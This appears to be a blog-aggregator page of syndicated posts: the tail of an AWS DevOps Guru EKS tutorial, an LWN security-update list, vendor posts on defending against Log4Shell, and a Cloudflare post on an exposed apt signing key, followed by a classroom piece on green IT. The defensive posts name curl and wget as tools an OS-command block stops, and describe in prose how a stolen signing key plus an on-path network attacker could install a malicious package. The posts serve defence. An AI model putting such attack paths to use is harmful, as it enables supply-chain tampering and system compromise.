 "InsightDescription": "ContainerInsights pod_number_of_container_restarts Anomalous In Stack eksctl-devopsguru-eks-cluster-cluster",
 "InsightSeverity": "high",
 "StartTime": 1636147920000,
 "Anomalies": [
 {
 "Id": "ALAGy5sIITl9e6i66eo6rKQAAAF88gInwEVT2WRSTV5wSTP8KWDzeCYALulFupOQ",
 "StartTime": 1636147800000,
 "SourceDetails": [
 {
 "DataSource": "CW_METRICS",
 "DataIdentifiers": {
 "name": "pod_number_of_container_restarts",
 "namespace": "ContainerInsights",
 "period": "60",
 "stat": "Average",
 "unit": "None",
 "dimensions": "{\"PodName\":\"java-sample-app\",\"ClusterName\":\"devopsguru-eks-cluster\",\"Namespace\":\"aws-otel-eks\"}"
 }
 ....
 "awsInsightSource": "aws.devopsguru"
}

Amazon DevOps Guru Console collects the insights under the Insights selection as shown in the following figure. Select Insights to view the details.

Amazon DevOps Guru Insights. An insight is displayed with a status of Ongoing and Severity of High.

Aggregated Metrics provides the identification of the EKS Container Metrics that have errored. In this case, pod_memory_utilization_over_pod_limit and pod_number_of_container_restarts.

Aggregated Metrics panel with pod_memory_utilization_over_pod_limit and pod_number_of_container_restarts for the Amazon EKS cluster names devopsguru-eks-cluster. Graphically a timeline including time and date is displayed conveying the length of the anomaly.

Further details can be identified by selecting and expanding each insight as shown in the following figure.

Displays the ability to expand the cluster metrics providing further information on the PodName, Namespace and ClusterName. Furthermore, a search bar is provided to search on name, stack or service name.

Note that the display provides information around the Cluster, PodName, and Namespace. This helps operators maintaining large numbers of EKS Clusters to quickly isolate the offending Pod, its operating Namespace, and EKS Cluster to which it belongs. A search bar provides further filtering to isolate the name, stack, or service name displayed.

Cleaning Up

Follow the steps to delete the resources to prevent additional charges being posted to your account.

Amazon EKS Cluster Cleanup

Follow these steps to detach the customer managed policy and delete the cluster.

  • Detach customer managed policy, AWSDistroOpenTelemetryPolicy, via IAM Console.
  • Delete cluster using eksctl.
$ eksctl delete cluster devopsguru-eks-cluster --region <region>
2021-10-13 14:08:28 [i] eksctl version 0.69.0
2021-10-13 14:08:28 [i] using region <region>
2021-10-13 14:08:28 [i] deleting EKS cluster "devopsguru-eks-cluster"
2021-10-13 14:08:30 [i] will drain 0 unmanaged nodegroup(s) in cluster "devopsguru-eks-cluster"
2021-10-13 14:08:32 [i] deleted 0 Fargate profile(s)
2021-10-13 14:08:33 [✔] kubeconfig has been updated
2021-10-13 14:08:33 [i] cleaning up AWS load balancers created by Kubernetes objects of Kind Service or Ingress
2021-10-13 14:09:02 [i] 2 sequential tasks: { delete nodegroup "managed-ng-private", delete cluster control plane "devopsguru-eks-cluster" [async] }
2021-10-13 14:09:02 [i] will delete stack "eksctl-devopsguru-eks-cluster-nodegroup-managed-ng-private"
2021-10-13 14:09:02 [i] waiting for stack "eksctl-devopsguru-eks-cluster-nodegroup-managed-ng-private" to get deleted
2021-10-13 14:12:30 [i] will delete stack "eksctl-devopsguru-eks-cluster-cluster"
2021-10-13 14:12:30 [✔] all cluster resources were deleted

Conclusion

In the previous scenarios, demonstration of the new cluster organization and additional container metrics was performed. Both of these features further simplify and expand the ability for an operator to more easily identify issues within a container cluster when Amazon DevOps Guru detects anomalies. You can start building your own solutions that employ Amazon CloudWatch Agent / AWS Distro for OpenTelemetry Agent and Amazon DevOps Guru by reading the documentation. This provides a conceptual overview and practical examples to help you understand the features provided by Amazon DevOps Guru and how to use them.

About the authors

Rahul Sharad Gaikwad

Rahul Sharad Gaikwad is a Lead Consultant – DevOps with AWS. He helps customers and partners on their Cloud and DevOps adoption journey. He is passionate about technology and enjoys collaborating with customers. In his spare time, he focuses on his PhD Research work. He also enjoys gymming and spending time with his family.

Leo Da Silva

Leo Da Silva is a Partner Solution Architect Manager at AWS and uses his knowledge to help customers better utilize cloud services and technologies. Over the years, he had the opportunity to work in large, complex environments, designing, architecting, and implementing highly scalable and secure solutions to global companies. He is passionate about football, BBQ, and Jiu Jitsu — the Brazilian version of them all.

Chris Riley

Chris Riley is a Senior Solutions Architect working with Strategic Accounts providing support in Industry segments including Healthcare, Financial Services, Public Sector, Automotive and Manufacturing via Managed AI/ML Services, IoT and Serverless Services.

Security updates for Wednesday

Post Syndicated from original https://lwn.net/Articles/878749/rss

Security updates have been issued by Fedora (libopenmpt), openSUSE (icu.691, log4j, nim, postgresql10, and xorg-x11-server), Red Hat (idm:DL1), SUSE (gettext-runtime, icu.691, runc, storm, storm-kit, and xorg-x11-server), and Ubuntu (xorg-server, xorg-server-hwe-18.04, xwayland).

How to Protect Your Applications Against Log4Shell With tCell

Post Syndicated from Bria Grangard original https://blog.rapid7.com/2021/12/15/how-to-protect-your-applications-against-log4shell-with-tcell/

How to Protect Your Applications Against Log4Shell With tCell

By now, we’re sure you’re familiar with all things Log4Shell – but we want to make sure we share how to protect your applications. Applications are a critical part of any organization’s attack surface, and we’re seeing thousands of Log4Shell attack attempts in our customers’ environments every hour. Let’s walk through the various ways tCell can help our customers protect against Log4Shell attacks.

1. Monitor for any Log4Shell attack attempts

tCell is a web application and API protection solution that has traditional web application firewall monitoring capabilities such as monitoring attacks. Over the weekend, we launched a new App Firewall detection for all tCell customers. This means tCell customers can leverage our App Firewall functionality to determine if any Log4Shell attack attempts have taken place. From there, customers can also drill in to more information on the events that took place. We’ve created a video to walk you through how to detect an Log4Shell attack attempts using the App Firewall feature in tCell in the video below.



How to Protect Your Applications Against Log4Shell With tCell

As a reminder, customers will need to make sure they have deployed the JVM agent on their apps to begin monitoring their applications’ activity. Make sure to check out our Quick Start Guide if you need help setting up tCell.

2. Block against Log4Shell attacks

Monitoring is great, but what you may be looking for is something that protects your application by blocking Log4Shell attack attempts. In order to do this, we’ve added a default pattern (tc-cmdi-4) for customers to block against. Below is a video on how to set up this custom block rule, or reach out to the tCell team if you need any assistance rolling this out at large.



How to Protect Your Applications Against Log4Shell With tCell

As research continues and new patterns are identified, we will provide updates to tc-cdmi-4 to improve coverage. Customers have already noted how the new default pattern is providing more protection coverage than yesterday.

3. Identify vulnerable packages (such as CVE 2021-44228)

We’ve heard from customers that they’re unsure of whether or not their applications are leveraging the vulnerable package. With tCell, we will alert you if any vulnerable packages (such as CVE 2021-44228 and CVE 2021-45046) are loaded by the application at runtime. The best way to eliminate the risk exposure for Log4Shell is to upgrade any vulnerable packages to 2.16. Check out the video below for more information.



How to Protect Your Applications Against Log4Shell With tCell

If you would like to provide additional checks outside of the vulnerable packages check at runtime, please refer to our blog on how InsightVM can help you do this.

4. Enable OS commands

One of the benefits of using tCell’s app server agents is the fact that you can enable blocking for OS commands. This will prevent a wide range of exploits leveraging things like curl, wget, etc. Below you’ll find a picture of how to enable OS commands (either report only or block and report).

How to Protect Your Applications Against Log4Shell With tCell

5. Detect and block suspicious actors

All events that are detected by the App Firewall in tCell are fed into the analytics engine to determine Suspicious Actors. The Suspicious Actors feature takes in multiple inputs (such as failed logins, injections, unusual inputs, etc.) and correlates these to an IP address.

How to Protect Your Applications Against Log4Shell With tCell

Not only can you monitor for suspicious actors with tCell, but you can also configure tCell to block all activity or just the suspicious activity from the malicious actor’s IP.

How to Protect Your Applications Against Log4Shell With tCell

All the components together make the magic happen

The power of tCell isn’t in one or two features, but rather its robust capability set, which we believe is required to secure any environment with a defense-in-depth approach. We will help customers not only identify vulnerable Log4j packages that are being used, but also assist with monitoring for suspicious activity and block attacks. The best security is when you have multiple types of defenses available to protect against bad actors, and this is why using the capabilities mentioned here will prove to be valuable in protecting against Log4Shell and future threats.

Get more critical insights about defending against Log4Shell

Check out our resource center

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Hot on the heels of CVE-2021-44228 a second Log4J CVE has been filed CVE-2021-45046. The rules that we previously released for CVE-2021-44228 give the same level of protection for this new CVE.

This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0. The latest version can be found on the Log4J download page.

Customers using the Cloudflare WAF have three rules to help mitigate any exploit attempts:

Rule ID Description Default Action
100514 (legacy WAF)
6b1cc72dff9746469d4695a474430f12 (new WAF)
Log4J Headers BLOCK
100515 (legacy WAF)
0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF)
Log4J Body BLOCK
100516 (legacy WAF)
5f6744fa026a4638bda5b3d7d5e015dd (new WAF)
Log4J URL BLOCK

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

In addition to the above rules we have also released a fourth rule that will protect against a much wider range of attacks at the cost of a higher false positive rate. For that reason we have made it available but not set it to BLOCK by default:

Rule ID Description Default Action
100517 (legacy WAF)
2c5413e155db4365befe0df160ba67d7 (new WAF)
Log4J Advanced URI, Headers DISABLED

Who is affected

Log4J is a powerful Java-based logging library maintained by the Apache Software Foundation.

In all Log4J versions >= 2.0-beta9 and <= 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

In addition, the previous mitigations for CVE-2021-22448 as seen in version 2.15.0 were not adequate to protect against CVE-2021-45046.

An exposed apt signing key and how to improve apt security

Post Syndicated from Jeff Hiner original https://blog.cloudflare.com/dont-use-apt-key/

An exposed apt signing key and how to improve apt security

An exposed apt signing key and how to improve apt security

Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. The report stated that this private key had been exposed. We’ve since rotated this key and we are taking steps to ensure a similar problem can’t happen again. Before you read on, if you are a Linux user of Cloudflare WARP, please follow these instructions to rotate the Cloudflare GPG Public Key trusted by your package manager. This only affects WARP users who have installed WARP on Linux. It does not affect Cloudflare customers of any of our other products or WARP users on mobile devices.

But we also realized that the impact of an improperly secured private key can have consequences that extend beyond the scope of one third-party repository. The remainder of this blog shows how to improve the security of apt with third-party repositories.

The unexpected impact

At first, we thought that the exposed signing key could only be used by an attacker to forge packages distributed through our package repository. However, when reviewing impact for Debian and Ubuntu platforms we found that our instructions were outdated and insecure. In fact, we found the majority of Debian package repositories on the Internet were providing the same poor guidance: download the GPG key from a website and then either pipe it directly into apt-key or copy it into /etc/apt/trusted.gpg.d/. This method adds the key as a trusted root for software installation from any source. To see why this is a problem, we have to understand how apt downloads and verifies software packages.

How apt verifies packages

In the early days of Linux, package maintainers wanted to make sure users could trust that the software being installed on their machines came from a trusted source.

Apt has a list of places to pull packages from (sources) and a method to validate those sources (trusted public keys). Historically, the keys were stored in a single keyring file: /etc/apt/trusted.gpg. Later, as third party repositories became more common, apt could also look inside /etc/apt/trusted.gpg.d/ for individual key files.

What happens when you run apt update? First, apt fetches a signed file called InRelease from each source. Some servers supply separate Release and signature files instead, but they serve the same purpose. InRelease is a file containing metadata that can be used to cryptographically validate every package in the repository. Critically, it is also signed by the repository owner’s private key. As part of the update process, apt verifies that the InRelease file has a valid signature, and that the signature was generated by a trusted root. If everything checks out, a local package cache is updated with the repository’s contents. This cache is directly used when installing packages. The chain of signed InRelease files and cryptographic hashes ensures that each downloaded package hasn’t been corrupted or tampered with along the way.

An exposed apt signing key and how to improve apt security

A typical third-party repository today

For most Ubuntu/Debian users today, this is what adding a third-party repository looks like in practice:

  1. Add a file in /etc/apt/sources.list.d/ telling apt where to look for packages.
  2. Add the gpg public key to /etc/apt/trusted.gpg.d/, probably via apt-key.

If apt-key is used in the second step, the command typically pops up a deprecation warning, telling you not to use apt-key. There’s a good reason: adding a key like this trusts it for any repository, not just the source from step one. This means if the private key associated with this new source is compromised, attackers can use it to bypass apt’s signature verification and install their own packages.

What would this type of attack look like? Assume you’ve got a stock Debian setup with a default sources list1:

deb http://deb.debian.org/debian/ bullseye main non-free contrib
deb http://security.debian.org/debian-security bullseye-security main contrib non-free

At some point you installed a trusted key that was later exposed, and the attacker has the private key. This key was added alongside a source pointing at https, assuming that even if the key is broken an attacker would have to break TLS encryption as well to install software via that route.

You’re enjoying a hot drink at your local cafe, where someone nefarious has managed to hack the router without your knowledge. They’re able to intercept http traffic and modify it without your knowledge. An auto-update script on your laptop runs apt update. The attacker pretends to be deb.debian.org, and because at least one source is configured to use http, the attacker doesn’t need to break https. They return a modified InRelease file signed with the compromised key, indicating that a newer update of the bash package is available. apt pulls the new package (again from the attacker) and installs it, as root. Now you’ve got a big problem2.

A better way

It seems the way most folks are told to set up third-party Debian repositories is wrong. What if you could tell apt to only trust that GPG key for a specific source? That, combined with the use of https, would significantly reduce the impact of a key compromise. As it turns out, there’s a way to do that! You’ll need to do two things:

  1. Make sure the key isn’t in /etc/apt/trusted.gpg or /etc/apt/trusted.gpg.d/ anymore. If the key is its own file, the easiest way to do this is to move it to /usr/share/keyrings/. Make sure the file is owned by root, and only root can write to it. This step is important, because it prevents apt from using this key to check all repositories in the sources list.
  2. Modify the sources file in /etc/apt/sources.list.d/ telling apt that this particular repository can be “signed by” a specific key. When you’re done, the line should look like this:

deb [signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

Some source lists contain other metadata indicating that the source is only valid for certain architectures. If that’s the case, just add a space in the middle, like so:

deb [amd64 signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

We’ve updated the instructions on our own repositories for the WARP Client and Cloudflare with this information, and we hope others will follow suit.

If you run apt-key list on your own machine, you’ll probably find several keys that are trusted far more than they should be. Now you know how to fix them!

For those running your own repository, now is a great time to review your installation instructions. If your instructions tell users to curl a public key file and pipe it straight into sudo apt-key, maybe there’s a safer way. While you’re in there, ensuring the package repository supports https is a great way to add an extra layer of security (and if you host your traffic via Cloudflare, it’s easy to set up, and free. You can follow this blog post to learn how to properly configure Cloudflare to cache Debian packages).


1RPM-based distros like Fedora, CentOS, and RHEL also use a common trusted GPG store to validate packages, but since they generally use https by default to fetch updates they aren’t vulnerable to this particular attack.
2The attack described above requires an active on-path network attacker. If you are using the WARP client or Cloudflare for Teams to tunnel your traffic to Cloudflare, your network traffic cannot be tampered with on local networks.

Green information technology and classroom discussions

Post Syndicated from Gemma Coleman original https://www.raspberrypi.org/blog/green-information-technology-climate-change-data-centre-e-waste-hello-world/

The global IT industry generates as much CO2 as the aviation industry. In Hello World issue 17, we learn about the hidden impact of our IT use and the changes we can make from Beverly Clarke, national community manager for Computing at School and author of Computer Science Teacher: Insight Into the Computing Classroom.

With the onset of the pandemic, the world seemed to shut down. Flights were grounded, fewer people were commuting, and companies and individuals increased their use of technology for work and communication. On the surface, this seemed like a positive time for the environment. However, I soon found myself wondering about the impact that this increased use of technology would have on our planet, in particular the increases in energy consumption and e-waste. This is a major social, moral, and ethical issue that is hiding in plain sight — green IT is big news.

This is a major social, moral, and ethical issue that is hiding in plain sight — green IT is big news.

Energy and data centres

Thinking that online is always better for the planet is not always as straightforward as it seems. If we choose to meet via conference call rather than travelling to a meeting, there are hidden environmental impacts to consider. If there are 50 people on a call from across the globe, all of the data generated is being routed around the world through data centres, and a lot of energy is being used. If all of those people are also using video, that is even more energy than audio only.

Stacks of server hardware behind metal fencing in a data centre.
Data centres consume a lot of energy — and how is that energy generated?

Not only is the amount of energy being used a concern, but we must also ask ourselves how these data centres are being powered. Is the energy they are using coming from a renewable source? If not, we may be replacing one environmental problem with another.

What about other areas of our lives, such as taking photos or filming videos? These two activities have probably increased as we have been separated from family and friends. They use energy, especially when the image or video is then shared with others around the world and consequently routed through data centres. A large amount of energy is being used, and more is used the further the image travels.

Not only is the amount of energy being used a concern, but we must also ask ourselves how these data centres are being powered.

Similarly, consider social media and the number of posts individuals and companies make on a daily basis. All of these are travelling through data centres and using energy, yet for the most part this is not visible to the user.

E-waste

E-waste is another green IT issue, and one that will only get worse as we rely on electronic devices more. As well as the potential eyesore of mountains of e-waste, there is also the impact upon the planet of mining the precious metals used in these electronics, such as gold, copper, aluminium, and steel.

A hand holding two smartphones.
In their marketing, device manufacturers and mobile network carriers make us see the phones we currently own in a negative light so that we feel the need to upgrade to the newest model.

The processes used to mine these metals lead to pollution, and we should also consider that some of the precious metals used in our devices could run out, as there is not an endless supply in the Earth’s surface.

It is also problematic that a lot of e-waste is sent to developing countries with limited recycling plants […].

It is also problematic that a lot of e-waste is sent to developing countries with limited recycling plants, and so much of the e-waste ends up in landfill. This can lead to toxic substances being leaked into the Earth’s surface.

First steps towards action

With my reflective hat on, I started to think about discussions we as teachers could have with pupils around this topic, and came up with the following:

  • Help learners to talk about the cloud and where it is located. We can remind them that the cloud is a physical entity. Show them images of data centres to help make this real, and allow them to appreciate where the data we generate every day goes.
  • Ask learners how many photos and videos they have on their devices, and where they think those items are stored. This can be extended to a year group or whole-school exercise so they can really appreciate the sheer amount of data being used and sent across the cloud, and how data centres fit with that energy consumption. I did this activity and found that I had 7163 photos and 304 videos on my phone — that’s using a lot of energy!
A classroom of students in North America.
Helping young people gain an understanding of the impact of our use of electronic devices is an important action you can take.
  • Ask learners to research any local data centres and find out how many data centres there are in the world. You could then develop this into a discussion, including language related to data centres such as sensors, storage devices, cabling, and infrastructure. This helps learners to connect the theory to real-world examples.
  • Ask learners to reflect upon how many devices they use that are connected to the Internet of Things.
  • Consider for ourselves and ask parents, family, and friends how our online usage has changed since before the pandemic.
  • Consider what happens to electronic devices when they are thrown away and become e-waste. Where does it all go? What is the effect of e-waste on communities and countries?

Tips for greener IT

UK-based educators can watch a recent episode of TV programme Dispatches that investigates the carbon footprint of the IT industry. You can add the following tips from the programme to your discussions:

  • Turn off electronic devices when not in use
  • Use audio only when on online calls
  • Dispose of your old devices responsibly
  • Look at company websites and see what their commitment is to green IT, and consider whether we should support companies whose commitment to the planet is poor
  • Use WiFi instead of 3G/4G/5G, as it uses less energy

These lists are not exhaustive, but provide a good starting point for discussions with learners. We should all play our small part in ensuring that we #RestoreOurEarth — this year’s Earth Day theme — and having an awareness and understanding of the impact of our use of electronic devices is part of the way forward.

Some resources on green IT — do you have others?

What about you? In the comments below, share your thoughts, tips, and resources on green IT and how we can bring awareness of it to our learners and young people at home.

The post Green information technology and classroom discussions appeared first on Raspberry Pi.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close